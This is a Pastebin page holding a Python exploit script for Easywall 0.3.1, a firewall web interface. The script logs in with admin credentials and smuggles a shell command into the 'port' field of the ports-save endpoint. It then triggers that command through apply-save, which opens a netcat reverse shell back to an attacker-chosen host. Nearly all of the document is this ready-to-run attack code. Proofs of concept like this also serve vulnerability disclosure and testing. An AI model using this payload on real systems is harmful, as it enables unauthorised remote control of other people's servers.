Advertisement
FlyFar

Easywall 0.3.1 - Authenticated Remote Command Execution

Mar 6th, 2024
626
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.05 KB | Cybersecurity | 0 0
  1. # Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution
  2. # Date: 30-11-2023
  3. # Exploit Author: Melvin Mejia
  4. # Vendor Homepage: https://jpylypiw.github.io/easywall/
  5. # Software Link: https://github.com/jpylypiw/easywall
  6. # Version: 0.3.1
  7. # Tested on: Ubuntu 22.04
  8.  
  9. import requests, json, urllib3
  10. urllib3.disable_warnings()
  11.  
  12. def exploit():
  13.    
  14.     # Replace values needed here
  15.     target_host = "192.168.1.25"
  16.     target_port= "12227"
  17.     lhost = "192.168.1.10"
  18.     lport = "9001"
  19.     user = "admin"
  20.     password = "admin"
  21.    
  22.     target = f"https://{target_host}:{target_port}"
  23.  
  24.     # Authenticate to the app
  25.     print("[+] Attempting login with the provided credentials...")
  26.     login_data = {"username":user, "password":password}
  27.     session = requests.session()
  28.     try:
  29.         login = session.post(f'{target}/login',data=login_data,verify=False)
  30.     except Exception as ex:
  31.         print("[!] There was a problem connecting to the app, error:", ex)
  32.         exit(1)
  33.  
  34.     if login.status_code != 200:
  35.         print("[!] Login failed.")
  36.         exit(1)
  37.     else:
  38.         print("[+] Login successfull.")    
  39.    
  40.     # Send the payload, the port parameter suffers from a command injection vulnerability
  41.     print("[+] Attempting to send payload.")
  42.     rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #'
  43.     data = {"port":f"123;{rev_shell}", "description":"","tcpudp":"tcp"}
  44.     send_payload = session.post(f"{target}/ports-save",data=data,verify=False)
  45.     if send_payload.status_code != 200:
  46.         print("[!] Failed to send payload.")
  47.         exit(1)
  48.     else:
  49.         print("[+] Payload sent.")
  50.  
  51.     # Trigger the execution of the payload
  52.     print("[+] Attempting execution.")
  53.     data = {"step_1":"", "step_2":""}
  54.     execute = session.post(f"{target}/apply-save",data=data, verify=False)
  55.     if execute.status_code != 200:
  56.         print("[!] Attempt to execute failed.")
  57.         exit(1)
  58.     else:
  59.         print(f"[+] Execution succeded, you should have gotten a shell at {lhost}:{lport}.")
  60.  
  61. exploit()
  62.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement